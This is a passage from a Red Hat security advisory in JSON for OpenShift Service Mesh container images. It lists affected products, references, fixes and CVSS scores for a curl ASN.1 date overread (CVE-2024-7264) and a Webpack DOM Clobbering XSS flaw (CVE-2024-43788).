"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-7264"
},
{
"category": "external",
"summary": "RHBZ#2301888",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301888"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-7264",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7264"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-7264",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7264"
},
{
"category": "external",
"summary": "https://www.oracle.com/security-alerts/cpuoct2024.html#AppendixMSQL",
"url": "https://www.oracle.com/security-alerts/cpuoct2024.html#AppendixMSQL"
}
],
"release_date": "2024-07-31T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "curl: libcurl: ASN.1 date parser overread"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
